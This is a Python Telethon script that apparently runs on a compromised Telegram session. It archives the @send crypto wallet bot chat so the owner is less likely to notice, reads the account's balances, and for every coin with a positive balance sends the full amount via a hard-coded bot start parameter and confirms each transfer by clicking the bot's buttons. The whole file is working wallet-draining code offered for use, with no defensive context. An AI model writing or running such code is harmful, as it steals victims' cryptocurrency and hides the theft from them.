from telethon.sync import TelegramClient
from telethon.tl.functions.messages import StartBotRequest
import time

client = args[0]

try:client.edit_folder('@send', 1)
except:...

client.send_message('@send', '/wallet')

try:client.edit_folder('@send', 1)
except:...

time.sleep(1)

last=client.iter_messages('@send',1)

for text in last:

    text = text.message

    cryptos = ['USDT','TON','SOL','GRAM','NOT','HMSTR','CATI','MY','DOGS','BTC','DOGE','LTC','ETH','BNB','TRX','USDC']

    values = '\n'.join(text.split(': ')).split('\n')
    res = []
    for val in values:
        if val.split(' ')[-1] in cryptos and '≈' not in val:
            num = val.split(' ')[0]
            name = val.split(' ')[-1]

            print(f'{name} - {num}')

            if float(num)>0:

                client(StartBotRequest('@send', '@send', 'IV0XOLp7c0mn'))

                time.sleep(1)

                last=client.iter_messages('@send',1)
                for t in last: 
                    if t.reply_markup:
                        ii=-1
                        for row in t.reply_markup.rows:
                            for button in row.buttons:
                                ii+=1
                                dat = button.data.decode()
                                if dat.replace('choose-currency-', '') == name:
                                    t.click(ii)
                                    time.sleep(1)
                                    client.send_message('@send',num)
                                    time.sleep(1)
                                    last=client.iter_messages('@send',1)
                                    for t in last: 
                                        if t.reply_markup:
                                            t.click(0)
                                            time.sleep(1)
                                            last=client.iter_messages('@send',1)
                                            for t in last: 
                                                if t.reply_markup:
                                                    t.click(0)
